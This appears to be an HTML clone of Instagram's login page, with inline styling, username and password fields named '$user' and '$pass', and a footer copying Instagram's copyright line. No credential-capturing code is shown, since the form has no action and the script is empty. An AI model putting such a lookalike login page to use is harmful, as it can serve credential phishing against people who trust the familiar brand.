<!DOCTYPE html>
<html lang="en">
<head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link href="img/logo.png" rel="icon" type="image/x-icon"/>
        <title>Instagram</title>
                <script>
                </script>
<style> 
        /*<link rel="stylesheet" href="style.css"> Css Externo / Incorporado / inline*/
*,
*::before,
*::after{
        margin: 0;
        padding: 0;
        box-sizing: inherit;
}
html{
        font-size: 10px;
        box-sizing: border-box;
        font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
}
/* img{
        width: 100%;
        max-width: 100%;
        height: 100%;
} */
a{
        text-decoration: none;
}
body{
        margin: 32px auto 0;
        background-color: #fafafa;
}
#wrapper{
        width: 100%;
        height: 100vh;
        display: flex;
        flex-direction: column;
        justify-content: 10rem;
        padding-top: 3rem;
}
.cotainer{
        width: 100%;
        max-width: 93.5rem;
        margin: 3rem auto 0;
}
#wrapper > .container{
        display: flex;
        justify-content: center;
        /* padding: 0 8%; */
        /* padding: 0 28rem; */
}
.phone-app-demo{
        padding-right: 20px;
        height: 64.8rem;
        /* background: url("img/celfix.png") no-repeat; */
        /* flex: 1; */
}
.form-data{
        /* margin-left: 2rem; */
        width: 80%;
        max-width: 36rem;
        margin-top: 3rem;
}
.form-data form{
        background-color: #fff;
        border: 1px solid #dbdbdb;
        display: flex;
        flex-direction: column;
        padding: 10px 40px;
        text-align: center;
}
.logo img{
        margin: 12px auto 32px;
        width: 175.4px;
}
.form-data form input{
        background: #fafafa;
        outline: 0;
        padding: 1rem;
        margin-bottom: 6px;
        border: 1.2px solid #e0e0e0;
        border-radius: .4rem;
}
.form-btn{
        margin: 1rem 0 1.5rem;
        height: 3rem;
        background-color: #0095f6;
        font-size: 1.4rem;
        color: #fff;
        font-weight: bold;
        border: none;
        border-radius: .4rem;
        cursor: pointer;
}
.form-btn-fb{
        background-color: #fff;
        border: none;
}
.icon-fb img{
        width: 16px;

        display: inline-block;
        margin-right: 8px;
        position: relative;
        top: 3px;
        /* width: 100%;
        max-width: 100%;
        height: 100%;
        background-position:-320px -224px;
        height:16px;
        width:16px;
        display:inline-block;
        margin-right:0.5px;
        position:relative;
        top:3px; */
} 
.has-separator{
        font-size: 1.3rem;
        color: #8e8e8e;
        text-transform: uppercase;
        position: relative;
        margin-bottom: 2.5rem;
}
.has-separator::before,
.has-separator::after{
        content: "";
        position: absolute;
        background-color: #dbdbdb;
        width: 40%;
        height: 1px;
        top: 50%;
        /* transform: translateY(-50%); */
}
.has-separator::before{
        left: 0;
}
.has-separator::after{
        right: 0;
}
.facebook-login{
        font-size: 1.4rem;
        font-weight: bold;
        color: #385185;
        margin-bottom: 2.5rem;
}
.facebook-login i{
        font-size: 2rem;
        margin-right: .7rem;
}
.sign-up{
        text-align: center;
        font-size: 1.4rem;
        color: #262626;
        padding: 2rem 0;
        background-color: #fff;
        border: 1px solid #dbdbdb;
        margin: 1rem 0;
}
.sign-up a{
        color: #3897f0;
        font-weight: 600;
}
.get-the-app{
        font-size: 1.4rem;
        text-align: center;
}
.get-the-app span{
        display: block;
        margin: 2rem 0;
        color: #262626;
}

.badges img{
        max-width: 14rem;
        cursor:pointer;
}
/* .badges img:first-child{
        margin-right: 1rem;
} */
footer {
        margin: 52px 52px;
}
.footer-nav ul{
        display: flex;
        flex-wrap: wrap;
        list-style: none;
        justify-content: center;
        font-size: 12px;
}
.footer-nav ul li{
        margin-right: 1.6rem;
        margin-bottom: 1rem;
}
.footer-nav ul li a{
        color: #999999;
}
.copyright-notice{
        color: #999999;
        display: flex;
        justify-content: center;
        font-size: 12px;
}
#wrapper{
        padding-top: 0;
}
@media (max-width: 1000px) {
        .phone-app-demo{
                display: none;
        }
        .form-data{
                margin: 0 auto;
        }
        #wrapper{
                padding-top: 0;
        }
        #wrapper > .container{
                padding: 0;
        }
        footer .container{
                padding: 0 2rem;
                justify-content: center;
        }
        .footer-nav ul{
                justify-content: center;
        }
        .footer-nav ul li{
                margin-bottom: 1rem;
        }
}
@media (max-width: 450px) {
        body{
                background-color: #fafafa;
        }
        #wrapper{
                padding-top: 0;
                /* background-color: transparent; */
        }
        /* .logo img{
                margin: -10px auto 35px;
        } */
        .form-data form{
                background-color: transparent;
                border: none;
                padding: 12px 7px 10px 7px;
        }
        .sign-up{
                background-color: transparent;
                border: none;
                margin: 1rem 0;
        }
        footer{
                padding-bottom: 2rem;
        }
}

</style>
</head>
<body>
<div id="wrapper">      
        <div class="container">
                <div class="phone-app-demo">
                        <img src="img/celfix.png" alt="">
                </div>
                <div class="form-data">
                        <form name="formuser">
                                <div class="logo">
                                        <img src="img/instagram1.png">
                                </div>
                                        <input type="text" name="$user" placeholder="text">
                                        <input type="text" name="$pass" placeholder="text">
                                        <button type="submit" value="Submit" class="form-btn">Login</button>

                                <span class="has-separator">Or</span>
                                <button type="submit" value="Submit" class="form-btn-fb">
                                        <a class ="facebook-login" href="https://facebook.com">
                                                <div class="icon-fb">
                                                        <img src="img/facebook.png" alt="">Login with Facebook
                                                </div>
                                        
                                        </a>
                                </button>       
                                <a class="password-reset" href="https://instagram.com">Forgot password?</a>
                        </form>
                        <div class="sign-up">
                                Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a>
                        </div>
                        <div class="get-the-app">
                                <span>Get the app.</span>
                                <div class="badges">
                                        <a href="https://www.apple.com/app-store/"><img src="img/as.png"></a>
                                        <a href="https://play.google.com/store?hl=pt_BR&gl=US"><img src="img/gp.png"> </a>
                                </div>
                        </div>
                </div>        
        </div>
</div>
<footer>
        <nav class="footer-nav">
                <ul>
                        <li>
                                <a href="#">About Us</a>
                        </li>
                        <li>
                                <a href="#">Support</a>
                        </li>
                        <li>
                                <a href="#">Press</a>
                        </li>
                        <li>
                                <a href="#">Api</a>
                        </li>
                        <li>
                                <a href="#">Jobs</a>
                        </li>
                        <li>
                                <a href="#">Privacy</a>
                        </li>
                        <li>
                                <a href="#">Terms</a>
                        </li>
                        <li>
                                <a href="#">Directory</a>
                        </li>
                        <li>
                                <a href="#">Profiles</a>
                        </li>
                        <li>
                                <a href="#">Hashtags</a>
                        </li>
                        <li>
                                <a href="#">Languages</a>
                        </li>
                </ul>
        </nav>
        <div class="copyright-notice">
                &copy; 2021 Instagram from facebook
        </div>
</footer>
</body>
</html>
